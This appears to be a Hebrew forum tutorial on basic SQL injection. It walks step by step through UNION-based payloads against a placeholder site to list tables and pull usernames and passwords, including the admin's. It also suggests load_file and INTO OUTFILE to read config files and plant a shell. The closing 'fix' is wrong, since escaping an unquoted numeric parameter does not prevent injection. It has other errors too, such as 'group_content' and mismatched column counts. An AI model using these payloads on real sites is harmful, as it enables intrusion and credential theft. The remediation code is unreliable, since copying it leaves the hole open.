איך אני מנצל את הפריצה לעזאזל?!!?
אז...
הינה המדריך ^_^
[ CODE]http://www.site.com/index.php?id=1 order by 1-- no error
http://www.site.com/index.php?id=1 order by 2-- no error
http://www.site.com/index.php?id=1 order by 3-- no error
http://www.site.com/index.php?id=1 order by 4-- no error
http://www.site.com/index.php?id=1 order by 5-- error[/CODE]
גילנו את מספר הטורים בטבלה pages.
כעת נשלוף.
קוד:
http://www.site.com/index.php?id=-1 UNION SELECT 1,2,3,4--
נשלוף את הטבלאות.
קוד:
http://www.site.com/index.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables
כמובן שאפשר להשתמש בcontent() או group_content או אפילו עם WHERE לשפר את הנוחות.
אני לא אפרט על זה כאן.
אוקיי נבחר את הטבלה users.
קוד:
http://www.site.com/index.php?id=-1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users'
כעת נשלוף את הטורים הרצויים ,username password.
קוד:
http://www.site.com/index.php?id=-1 UNION SELECT 1,username,0x3a,password,3,4 FROM users
כמובן שאפשר לשלוף ממשתמש רצוי
קוד:
http://www.site.com/index.php?id=-1 UNION SELECT 1,username,0x3a,password,3,4 FROM users WHERE username=admin
וזהו שלפנו תנתונים.
רק שליפת נתונים ? זה הכל ?
לא ,בכלל לא.
משהראתי לכם זה רק חלק קטן מימה שאפשר לעשות עם הפריצה ,כמו בשאר המדריכים שלי.
אפשר להשתמש בפונקצית load_file כדי לייבא קובץ כמו config.php ואפילו להעלאות שאל ולקבל ROOT עם SELECT INTO OUTFILE.
אני לא אפרט על הכל במדריך זה. אבל אני נותן לכם כיוונים ,רעיונות : ).
סגירת הפריצה
קוד PHP:
<?php
$id=mysql_real_escape_string($_GET['id']);
$query="SELECT text FROM pages WHERE pageid=$id";
mysql_fetch_array($query);
?>
מדריך לBasic SQL Injection
ציטוט ההודעה
